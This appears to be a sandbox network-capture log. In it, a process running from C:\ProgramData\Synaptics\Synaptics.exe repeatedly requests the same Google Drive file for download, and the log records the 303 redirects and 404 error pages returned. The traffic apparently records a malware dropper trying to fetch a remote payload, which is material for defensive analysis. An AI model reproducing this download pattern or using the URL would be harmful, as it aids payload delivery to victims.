                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:56 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Q3Pft15j2oj-gESZDKl5FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    61192.168.2.451987142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC71axouczu4WbTM8pSXSbChLXFs0qsoHGxdNBhEU5_XAmI74RgIt3pO4sGDcc06-5A7
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:56 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uNq4dszDdvHq_rjV9HIO4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 41 77 4e 7a 32 36 72 6e 51 52 41 68 73 69 35 6f 47 6a 64 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="tAwNz26rnQRAhsi5oGjdwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    62192.168.2.451986142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:56 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3IWHzKhwWeFeb_JoK6shYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    63192.168.2.451988142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC46ZI_PekB0sAhzBemEWI8MxNhagSFHMiAX2S0AzZaspS7AmbeTGb0bHFY2ACWrd3KdIuFvz4E
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:56 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6i__vCGVRhyTdhiVe6XEhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:56 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 4e 34 54 56 6f 69 49 56 52 34 4e 58 31 77 50 42 64 32 57 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="NN4TVoiIVR4NX1wPBd2Wcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    64192.168.2.451997142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:57 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ycSUrTXpjBpRJVHEzpqiGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    65192.168.2.451998142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:57 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XAwKcZLJnA_n_OWUaLPPRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    66192.168.2.452000142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    67192.168.2.452002142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    68192.168.2.452009142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:58 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6JUne41rIUBN_sfFCTtI_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    69192.168.2.452008142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:58 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Us91_tzOVjofvGMozSSh7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
